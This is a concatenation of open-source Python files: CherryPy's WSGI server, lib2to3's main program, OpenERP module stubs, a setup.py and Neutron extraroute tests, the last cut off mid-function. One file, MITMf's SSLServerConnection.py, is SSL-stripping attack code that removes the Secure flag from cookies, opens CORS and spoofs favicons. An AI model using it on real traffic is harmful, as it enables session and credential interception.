# I *think* this is right. EINTR should occur when a signal
# is received during the accept() call; all docs say retry
# the call, and I *think* I'm reading it right that Python
# will then go ahead and poll for and handle the signal
# elsewhere. See http://www.cherrypy.org/ticket/707.
return
if x.args[0] in socket_errors_nonblocking:
# Just try again. See http://www.cherrypy.org/ticket/479.
return
if x.args[0] in socket_errors_to_ignore:
# Our socket was closed.
# See http://www.cherrypy.org/ticket/686.
return
raise
def _get_interrupt(self):
return self._interrupt
def _set_interrupt(self, interrupt):
self._interrupt = True
self.stop()
self._interrupt = interrupt
interrupt = property(_get_interrupt, _set_interrupt,
doc="Set this to an Exception instance to "
"interrupt the server.")
def stop(self):
"""Gracefully shutdown a server that is serving forever."""
self.ready = False
if self._start_time is not None:
self._run_time += (time.time() - self._start_time)
self._start_time = None
sock = getattr(self, "socket", None)
if sock:
if not isinstance(self.bind_addr, basestring):
# Touch our own socket to make accept() return immediately.
try:
host, port = sock.getsockname()[:2]
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
# Changed to use error code and not message
# See http://www.cherrypy.org/ticket/860.
raise
else:
# Note that we're explicitly NOT using AI_PASSIVE,
# here, because we want an actual IP to touch.
# localhost won't work if we've bound to a public IP,
# but it will if we bound to '0.0.0.0' (INADDR_ANY).
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
if hasattr(sock, "close"):
sock.close()
self.socket = None
self.requests.stop(self.shutdown_timeout)
class Gateway(object):
"""A base class to interface HTTPServer with other systems, such as WSGI."""
def __init__(self, req):
self.req = req
def respond(self):
"""Process the current request. Must be overridden in a subclass."""
raise NotImplemented
# These may either be wsgiserver.SSLAdapter subclasses or the string names
# of such classes (in which case they will be lazily loaded).
ssl_adapters = {
'builtin': 'cherrypy.wsgiserver.ssl_builtin.BuiltinSSLAdapter',
'pyopenssl': 'cherrypy.wsgiserver.ssl_pyopenssl.pyOpenSSLAdapter',
}
def get_ssl_adapter_class(name='pyopenssl'):
"""Return an SSL adapter class for the given name."""
adapter = ssl_adapters[name.lower()]
if isinstance(adapter, basestring):
last_dot = adapter.rfind(".")
attr_name = adapter[last_dot + 1:]
mod_path = adapter[:last_dot]
try:
mod = sys.modules[mod_path]
if mod is None:
raise KeyError()
except KeyError:
# The last [''] is important.
mod = __import__(mod_path, globals(), locals(), [''])
# Let an AttributeError propagate outward.
try:
adapter = getattr(mod, attr_name)
except AttributeError:
raise AttributeError("'%s' object has no attribute '%s'"
% (mod_path, attr_name))
return adapter
# -------------------------------- WSGI Stuff -------------------------------- #
class CherryPyWSGIServer(HTTPServer):
"""A subclass of HTTPServer which calls a WSGI application."""
wsgi_version = (1, 0)
"""The version of WSGI to produce."""
def __init__(self, bind_addr, wsgi_app, numthreads=10, server_name=None,
max=-1, request_queue_size=5, timeout=10, shutdown_timeout=5):
self.requests = ThreadPool(self, min=numthreads or 1, max=max)
self.wsgi_app = wsgi_app
self.gateway = wsgi_gateways[self.wsgi_version]
self.bind_addr = bind_addr
if not server_name:
server_name = socket.gethostname()
self.server_name = server_name
self.request_queue_size = request_queue_size
self.timeout = timeout
self.shutdown_timeout = shutdown_timeout
self.clear_stats()
def _get_numthreads(self):
return self.requests.min
def _set_numthreads(self, value):
self.requests.min = value
numthreads = property(_get_numthreads, _set_numthreads)
class WSGIGateway(Gateway):
"""A base class to interface HTTPServer with WSGI."""
def __init__(self, req):
self.req = req
self.started_response = False
self.env = self.get_environ()
self.remaining_bytes_out = None
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
raise NotImplemented
def respond(self):
"""Process the current request."""
response = self.req.server.wsgi_app(self.env, self.start_response)
try:
for chunk in response:
# "The start_response callable must not actually transmit
# the response headers. Instead, it must store them for the
# server or gateway to transmit only after the first
# iteration of the application return value that yields
# a NON-EMPTY string, or upon the application's first
# invocation of the write() callable." (PEP 333)
if chunk:
if isinstance(chunk, unicodestr):
chunk = chunk.encode('ISO-8859-1')
self.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
def start_response(self, status, headers, exc_info = None):
"""WSGI callable to begin the HTTP response."""
# "The application may call start_response more than once,
# if and only if the exc_info argument is provided."
if self.started_response and not exc_info:
raise AssertionError("WSGI start_response called a second "
"time with no exc_info.")
self.started_response = True
# "if exc_info is provided, and the HTTP headers have already been
# sent, start_response must raise an error, and should raise the
# exc_info tuple."
if self.req.sent_headers:
try:
raise exc_info[0], exc_info[1], exc_info[2]
finally:
exc_info = None
self.req.status = status
for k, v in headers:
if not isinstance(k, str):
raise TypeError("WSGI response header key %r is not of type str." % k)
if not isinstance(v, str):
raise TypeError("WSGI response header value %r is not of type str." % v)
if k.lower() == 'content-length':
self.remaining_bytes_out = int(v)
self.req.outheaders.extend(headers)
return self.write
def write(self, chunk):
"""WSGI callable to write unbuffered data to the client.
This method is also used internally by start_response (to write
data from the iterable returned by the WSGI application).
"""
if not self.started_response:
raise AssertionError("WSGI write called before start_response.")
chunklen = len(chunk)
rbo = self.remaining_bytes_out
if rbo is not None and chunklen > rbo:
if not self.req.sent_headers:
# Whew. We can send a 500 to the client.
self.req.simple_response("500 Internal Server Error",
"The requested resource returned more bytes than the "
"declared Content-Length.")
else:
# Dang. We have probably already sent data. Truncate the chunk
# to fit (so the client doesn't hang) and raise an error later.
chunk = chunk[:rbo]
if not self.req.sent_headers:
self.req.sent_headers = True
self.req.send_headers()
self.req.write(chunk)
if rbo is not None:
rbo -= chunklen
if rbo < 0:
raise ValueError(
"Response body exceeds the declared Content-Length.")
class WSGIGateway_10(WSGIGateway):
"""A Gateway class to interface HTTPServer with WSGI 1.0.x."""
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
req = self.req
env = {
# set a non-standard environ entry so the WSGI app can know what
# the *real* server protocol is (and what features to support).
# See http://www.faqs.org/rfcs/rfc2145.html.
'ACTUAL_SERVER_PROTOCOL': req.server.protocol,
'PATH_INFO': req.path,
'QUERY_STRING': req.qs,
'REMOTE_ADDR': req.conn.remote_addr or '',
'REMOTE_PORT': str(req.conn.remote_port or ''),
'REQUEST_METHOD': req.method,
'REQUEST_URI': req.uri,
'SCRIPT_NAME': '',
'SERVER_NAME': req.server.server_name,
# Bah. "SERVER_PROTOCOL" is actually the REQUEST protocol.
'SERVER_PROTOCOL': req.request_protocol,
'SERVER_SOFTWARE': req.server.software,
'wsgi.errors': sys.stderr,
'wsgi.input': req.rfile,
'wsgi.multiprocess': False,
'wsgi.multithread': True,
'wsgi.run_once': False,
'wsgi.url_scheme': req.scheme,
'wsgi.version': (1, 0),
}
if isinstance(req.server.bind_addr, basestring):
# AF_UNIX. This isn't really allowed by WSGI, which doesn't
# address unix domain sockets. But it's better than nothing.
env["SERVER_PORT"] = ""
else:
env["SERVER_PORT"] = str(req.server.bind_addr[1])
# Request headers
for k, v in req.inheaders.iteritems():
env["HTTP_" + k.upper().replace("-", "_")] = v
# CONTENT_TYPE/CONTENT_LENGTH
ct = env.pop("HTTP_CONTENT_TYPE", None)
if ct is not None:
env["CONTENT_TYPE"] = ct
cl = env.pop("HTTP_CONTENT_LENGTH", None)
if cl is not None:
env["CONTENT_LENGTH"] = cl
if req.conn.ssl_env:
env.update(req.conn.ssl_env)
return env
class WSGIGateway_u0(WSGIGateway_10):
"""A Gateway class to interface HTTPServer with WSGI u.0.
WSGI u.0 is an experimental protocol, which uses unicode for keys and values
in both Python 2 and Python 3.
"""
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
req = self.req
env_10 = WSGIGateway_10.get_environ(self)
env = dict([(k.decode('ISO-8859-1'), v) for k, v in env_10.iteritems()])
env[u'wsgi.version'] = ('u', 0)
# Request-URI
env.setdefault(u'wsgi.url_encoding', u'utf-8')
try:
for key in [u"PATH_INFO", u"SCRIPT_NAME", u"QUERY_STRING"]:
env[key] = env_10[str(key)].decode(env[u'wsgi.url_encoding'])
except UnicodeDecodeError:
# Fall back to latin 1 so apps can transcode if needed.
env[u'wsgi.url_encoding'] = u'ISO-8859-1'
for key in [u"PATH_INFO", u"SCRIPT_NAME", u"QUERY_STRING"]:
env[key] = env_10[str(key)].decode(env[u'wsgi.url_encoding'])
for k, v in sorted(env.items()):
if isinstance(v, str) and k not in ('REQUEST_URI', 'wsgi.input'):
env[k] = v.decode('ISO-8859-1')
return env
wsgi_gateways = {
(1, 0): WSGIGateway_10,
('u', 0): WSGIGateway_u0,
}
class WSGIPathInfoDispatcher(object):
"""A WSGI dispatcher for dispatch based on the PATH_INFO.
apps: a dict or list of (path_prefix, app) pairs.
"""
def __init__(self, apps):
try:
apps = list(apps.items())
except AttributeError:
pass
# Sort the apps by len(path), descending
apps.sort(cmp=lambda x,y: cmp(len(x[0]), len(y[0])))
apps.reverse()
# The path_prefix strings must start, but not end, with a slash.
# Use "" instead of "/".
self.apps = [(p.rstrip("/"), a) for p, a in apps]
def __call__(self, environ, start_response):
path = environ["PATH_INFO"] or "/"
for p, app in self.apps:
# The apps list should be sorted by length, descending.
if path.startswith(p + "/") or path == p:
environ = environ.copy()
environ["SCRIPT_NAME"] = environ["SCRIPT_NAME"] + p
environ["PATH_INFO"] = path[len(p):]
return app(environ, start_response)
start_response('404 Not Found', [('Content-Type', 'text/plain'),
('Content-Length', '0')])
return ['']
| mit |
nicolargo/intellij-community | python/helpers/pydev/third_party/pep8/lib2to3/lib2to3/main.py | 250 | 11605 | """
Main program for 2to3.
"""
from __future__ import with_statement
import sys
import os
import difflib
import logging
import shutil
import optparse
from . import refactor
def diff_texts(a, b, filename):
"""Return a unified diff of two strings."""
a = a.splitlines()
b = b.splitlines()
return difflib.unified_diff(a, b, filename, filename,
"(original)", "(refactored)",
lineterm="")
class StdoutRefactoringTool(refactor.MultiprocessRefactoringTool):
"""
A refactoring tool that can avoid overwriting its input files.
Prints output to stdout.
Output files can optionally be written to a different directory and or
have an extra file suffix appended to their name for use in situations
where you do not want to replace the input files.
"""
def __init__(self, fixers, options, explicit, nobackups, show_diffs,
input_base_dir='', output_dir='', append_suffix=''):
"""
Args:
fixers: A list of fixers to import.
options: A dict with RefactoringTool configuration.
explicit: A list of fixers to run even if they are explicit.
nobackups: If true no backup '.bak' files will be created for those
files that are being refactored.
show_diffs: Should diffs of the refactoring be printed to stdout?
input_base_dir: The base directory for all input files. This class
will strip this path prefix off of filenames before substituting
it with output_dir. Only meaningful if output_dir is supplied.
All files processed by refactor() must start with this path.
output_dir: If supplied, all converted files will be written into
this directory tree instead of input_base_dir.
append_suffix: If supplied, all files output by this tool will have
this appended to their filename. Useful for changing .py to
.py3 for example by passing append_suffix='3'.
"""
self.nobackups = nobackups
self.show_diffs = show_diffs
if input_base_dir and not input_base_dir.endswith(os.sep):
input_base_dir += os.sep
self._input_base_dir = input_base_dir
self._output_dir = output_dir
self._append_suffix = append_suffix
super(StdoutRefactoringTool, self).__init__(fixers, options, explicit)
def log_error(self, msg, *args, **kwargs):
self.errors.append((msg, args, kwargs))
self.logger.error(msg, *args, **kwargs)
def write_file(self, new_text, filename, old_text, encoding):
orig_filename = filename
if self._output_dir:
if filename.startswith(self._input_base_dir):
filename = os.path.join(self._output_dir,
filename[len(self._input_base_dir):])
else:
raise ValueError('filename %s does not start with the '
'input_base_dir %s' % (
filename, self._input_base_dir))
if self._append_suffix:
filename += self._append_suffix
if orig_filename != filename:
output_dir = os.path.dirname(filename)
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
self.log_message('Writing converted %s to %s.', orig_filename,
filename)
if not self.nobackups:
# Make backup
backup = filename + ".bak"
if os.path.lexists(backup):
try:
os.remove(backup)
except os.error, err:
self.log_message("Can't remove backup %s", backup)
try:
os.rename(filename, backup)
except os.error, err:
self.log_message("Can't rename %s to %s", filename, backup)
# Actually write the new file
write = super(StdoutRefactoringTool, self).write_file
write(new_text, filename, old_text, encoding)
if not self.nobackups:
shutil.copymode(backup, filename)
if orig_filename != filename:
# Preserve the file mode in the new output directory.
shutil.copymode(orig_filename, filename)
def print_output(self, old, new, filename, equal):
if equal:
self.log_message("No changes to %s", filename)
else:
self.log_message("Refactored %s", filename)
if self.show_diffs:
diff_lines = diff_texts(old, new, filename)
try:
if self.output_lock is not None:
with self.output_lock:
for line in diff_lines:
print line
sys.stdout.flush()
else:
for line in diff_lines:
print line
except UnicodeEncodeError:
warn("couldn't encode %s's diff for your terminal" %
(filename,))
return
def warn(msg):
print >> sys.stderr, "WARNING: %s" % (msg,)
def main(fixer_pkg, args=None):
"""Main program.
Args:
fixer_pkg: the name of a package where the fixers are located.
args: optional; a list of command line arguments. If omitted,
sys.argv[1:] is used.
Returns a suggested exit status (0, 1, 2).
"""
# Set up option parser
parser = optparse.OptionParser(usage="2to3 [options] file|dir ...")
parser.add_option("-d", "--doctests_only", action="store_true",
help="Fix up doctests only")
parser.add_option("-f", "--fix", action="append", default=[],
help="Each FIX specifies a transformation; default: all")
parser.add_option("-j", "--processes", action="store", default=1,
type="int", help="Run 2to3 concurrently")
parser.add_option("-x", "--nofix", action="append", default=[],
help="Prevent a transformation from being run")
parser.add_option("-l", "--list-fixes", action="store_true",
help="List available transformations")
parser.add_option("-p", "--print-function", action="store_true",
help="Modify the grammar so that print() is a function")
parser.add_option("-v", "--verbose", action="store_true",
help="More verbose logging")
parser.add_option("--no-diffs", action="store_true",
help="Don't show diffs of the refactoring")
parser.add_option("-w", "--write", action="store_true",
help="Write back modified files")
parser.add_option("-n", "--nobackups", action="store_true", default=False,
help="Don't write backups for modified files")
parser.add_option("-o", "--output-dir", action="store", type="str",
default="", help="Put output files in this directory "
"instead of overwriting the input files. Requires -n.")
parser.add_option("-W", "--write-unchanged-files", action="store_true",
help="Also write files even if no changes were required"
" (useful with --output-dir); implies -w.")
parser.add_option("--add-suffix", action="store", type="str", default="",
help="Append this string to all output filenames."
" Requires -n if non-empty. "
"ex: --add-suffix='3' will generate .py3 files.")
# Parse command line arguments
refactor_stdin = False
flags = {}
options, args = parser.parse_args(args)
if options.write_unchanged_files:
flags["write_unchanged_files"] = True
if not options.write:
warn("--write-unchanged-files/-W implies -w.")
options.write = True
# If we allowed these, the original files would be renamed to backup names
# but not replaced.
if options.output_dir and not options.nobackups:
parser.error("Can't use --output-dir/-o without -n.")
if options.add_suffix and not options.nobackups:
parser.error("Can't use --add-suffix without -n.")
if not options.write and options.no_diffs:
warn("not writing files and not printing diffs; that's not very useful")
if not options.write and options.nobackups:
parser.error("Can't use -n without -w")
if options.list_fixes:
print "Available transformations for the -f/--fix option:"
for fixname in refactor.get_all_fix_names(fixer_pkg):
print fixname
if not args:
return 0
if not args:
print >> sys.stderr, "At least one file or directory argument required."
print >> sys.stderr, "Use --help to show usage."
return 2
if "-" in args:
refactor_stdin = True
if options.write:
print >> sys.stderr, "Can't write to stdin."
return 2
if options.print_function:
flags["print_function"] = True
# Set up logging handler
level = logging.DEBUG if options.verbose else logging.INFO
logging.basicConfig(format='%(name)s: %(message)s', level=level)
logger = logging.getLogger('lib2to3.main')
# Initialize the refactoring tool
avail_fixes = set(refactor.get_fixers_from_package(fixer_pkg))
unwanted_fixes = set(fixer_pkg + ".fix_" + fix for fix in options.nofix)
explicit = set()
if options.fix:
all_present = False
for fix in options.fix:
if fix == "all":
all_present = True
else:
explicit.add(fixer_pkg + ".fix_" + fix)
requested = avail_fixes.union(explicit) if all_present else explicit
else:
requested = avail_fixes.union(explicit)
fixer_names = requested.difference(unwanted_fixes)
input_base_dir = os.path.commonprefix(args)
if (input_base_dir and not input_base_dir.endswith(os.sep)
and not os.path.isdir(input_base_dir)):
# One or more similar names were passed, their directory is the base.
# os.path.commonprefix() is ignorant of path elements, this corrects
# for that weird API.
input_base_dir = os.path.dirname(input_base_dir)
if options.output_dir:
input_base_dir = input_base_dir.rstrip(os.sep)
logger.info('Output in %r will mirror the input directory %r layout.',
options.output_dir, input_base_dir)
rt = StdoutRefactoringTool(
sorted(fixer_names), flags, sorted(explicit),
options.nobackups, not options.no_diffs,
input_base_dir=input_base_dir,
output_dir=options.output_dir,
append_suffix=options.add_suffix)
# Refactor all files and directories passed as arguments
if not rt.errors:
if refactor_stdin:
rt.refactor_stdin()
else:
try:
rt.refactor(args, options.write, options.doctests_only,
options.processes)
except refactor.MultiprocessingUnsupported:
assert options.processes > 1
print >> sys.stderr, "Sorry, -j isn't " \
"supported on this platform."
return 1
rt.summarize()
# Return error status (0 if rt.errors is zero)
return int(bool(rt.errors))
| apache-2.0 |
0k/OpenUpgrade | addons/sale_margin/__init__.py | 441 | 1042 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sale_margin
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Frzk/Rig | setup.py | 1 | 1377 | #!/usr/bin/env python
# coding: utf-8
import re
from setuptools import setup
# Get version from `ellis/main.py`:
version = re.search('^__version__\s*=\s*"(.*)"',
open('ellis/main.py').read(),
re.M) \
.group(1)
setup(name='ellis',
version=version,
description='Ellis monitors systemd-journald and triggers actions.',
url='http://github.com/Frzk/Ellis',
author='François KUBLER',
author_email='[email protected]',
entry_points={
"console_scripts": ['ellis = ellis.main:main']
},
# data_files=[
# ('/usr/lib/systemd/system', ['ellis.service']),
# ],
packages=[
'ellis',
'ellis_actions'
],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Console',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.5',
'Topic :: Security',
'Topic :: Utilities',
'Topic :: System :: Monitoring',
],
install_requires=[
'smtplibaio >= 2.0.1',
'systemd-python >= 231',
])
| gpl-3.0 |
OSSESAC/odoopubarquiluz | addons/portal_project/__openerp__.py | 55 | 1669 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Portal Project',
'version': '0.1',
'category': 'Tools',
'complexity': 'easy',
'description': """
This module adds project menu and features (tasks) to your portal if project and portal are installed.
======================================================================================================
""",
'author': 'OpenERP SA',
'depends': ['project','portal'],
'data': [
'security/portal_security.xml',
'security/ir.model.access.csv',
'portal_project_view.xml',
],
'installable': True,
'auto_install': True,
'category': 'Hidden',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
yesho/MITMf | core/sslstrip/SSLServerConnection.py | 26 | 5607 | # Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [SSLServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if self.hsts:
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
log.debug("Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.real
if dominio in real:
v=" Domain=%s"%real[dominio]
log.debug("New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
else:
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("Found path-relative link in secure transmission: " + link)
log.debug("New Absolute path-relative link: " + absoluteLink)
elif not link.startswith('http'):
absoluteLink = "http://"+self.headers['host']+link
log.debug("Found relative link in secure transmission: " + link)
log.debug("New Absolute link: " + absoluteLink)
if not absoluteLink == "":
absoluteLink = absoluteLink.replace('&', '&')
self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);
def replaceCssLinks(self, data):
iterator = re.finditer(SSLServerConnection.cssExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(1))
return data
def replaceFavicon(self, data):
match = re.search(SSLServerConnection.iconExpression, data)
if (match != None):
data = re.sub(SSLServerConnection.iconExpression,
"<link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
else:
data = re.sub(SSLServerConnection.headExpression,
"<head><link rel=\"SHORTCUT ICON\" href=\"/favicon-x-favicon-x.ico\">", data)
return data
def replaceSecureLinks(self, data):
data = ServerConnection.replaceSecureLinks(self, data)
data = self.replaceCssLinks(data)
if (self.urlMonitor.isFaviconSpoofing()):
data = self.replaceFavicon(data)
iterator = re.finditer(SSLServerConnection.linkExpression, data)
for match in iterator:
self.buildAbsoluteLink(match.group(10))
return data
| gpl-3.0 |
jerryz1982/neutron | neutron/tests/unit/extensions/test_extraroute.py | 4 | 22953 | # Copyright 2013, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from webob import exc
from neutron.common import constants
from neutron.db import extraroute_db
from neutron.extensions import extraroute
from neutron.extensions import l3
from neutron.openstack.common import uuidutils
from neutron.tests.unit.api.v2 import test_base
from neutron.tests.unit.extensions import test_l3 as test_l3
LOG = logging.getLogger(__name__)
_uuid = uuidutils.generate_uuid
_get_path = test_base._get_path
class ExtraRouteTestExtensionManager(object):
def get_resources(self):
l3.RESOURCE_ATTRIBUTE_MAP['routers'].update(
extraroute.EXTENDED_ATTRIBUTES_2_0['routers'])
return l3.L3.get_resources()
def get_actions(self):
return []
def get_request_extensions(self):
return []
# This plugin class is for tests with plugin that integrates L3.
class TestExtraRouteIntPlugin(test_l3.TestL3NatIntPlugin,
extraroute_db.ExtraRoute_db_mixin):
supported_extension_aliases = ["external-net", "router", "extraroute"]
# A fake l3 service plugin class with extra route capability for
# plugins that delegate away L3 routing functionality
class TestExtraRouteL3NatServicePlugin(test_l3.TestL3NatServicePlugin,
extraroute_db.ExtraRoute_db_mixin):
supported_extension_aliases = ["router", "extraroute"]
class ExtraRouteDBTestCaseBase(object):
def _routes_update_prepare(self, router_id, subnet_id,
port_id, routes, skip_add=False):
if not skip_add:
self._router_interface_action('add', router_id, subnet_id, port_id)
self._update('routers', router_id, {'router': {'routes': routes}})
return self._show('routers', router_id)
def _routes_update_cleanup(self, port_id, subnet_id, router_id, routes):
self._update('routers', router_id, {'router': {'routes': routes}})
self._router_interface_action('remove', router_id, subnet_id, port_id)
def test_route_update_with_one_route(self):
routes = [{'destination': '135.207.0.0/16', 'nexthop': '10.0.1.3'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes)
self.assertEqual(body['router']['routes'], routes)
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_route_clear_routes_with_None(self):
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._routes_update_prepare(r['router']['id'],
None, p['port']['id'], routes)
body = self._update('routers', r['router']['id'],
{'router': {'routes': None}})
self.assertEqual(body['router']['routes'], [])
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_router_interface_in_use_by_route(self):
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes)
self.assertEqual(body['router']['routes'], routes)
self._router_interface_action(
'remove',
r['router']['id'],
None,
p['port']['id'],
expected_code=exc.HTTPConflict.code)
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_route_update_with_multi_routes(self):
routes = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes)
self.assertEqual(sorted(body['router']['routes']),
sorted(routes))
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def test_routes_update_for_multiple_routers(self):
routes1 = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.0.3'}]
routes2 = [{'destination': '12.0.0.0/8',
'nexthop': '10.0.0.4'}]
with self.router() as r1,\
self.router() as r2,\
self.subnet(cidr='10.0.0.0/24') as s:
with self.port(subnet=s) as p1, self.port(subnet=s) as p2:
body = self._routes_update_prepare(r1['router']['id'],
None, p1['port']['id'],
routes1)
self.assertEqual(body['router']['routes'], routes1)
body = self._routes_update_prepare(r2['router']['id'],
None, p2['port']['id'],
routes2)
self.assertEqual(body['router']['routes'], routes2)
self._routes_update_cleanup(p1['port']['id'],
None, r1['router']['id'], [])
self._routes_update_cleanup(p2['port']['id'],
None, r2['router']['id'], [])
def test_router_update_delete_routes(self):
routes_orig = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '12.0.0.0/8',
'nexthop': '10.0.1.4'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
routes_left = [{'destination': '135.207.0.0/16',
'nexthop': '10.0.1.3'},
{'destination': '141.212.0.0/16',
'nexthop': '10.0.1.5'}]
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes_orig)
self.assertEqual(sorted(body['router']['routes']),
sorted(routes_orig))
body = self._routes_update_prepare(r['router']['id'],
None, p['port']['id'],
routes_left,
skip_add=True)
self.assertEqual(sorted(body['router']['routes']),
sorted(routes_left))
self._routes_update_cleanup(p['port']['id'],
None, r['router']['id'], [])
def _test_malformed_route(self, routes):
with self.router() as r:
with self.subnet(cidr='10.0.1.0/24') as s:
with self.port(subnet=s) as p:
self._router_interface_action('add',
r['router']['id'],
None,
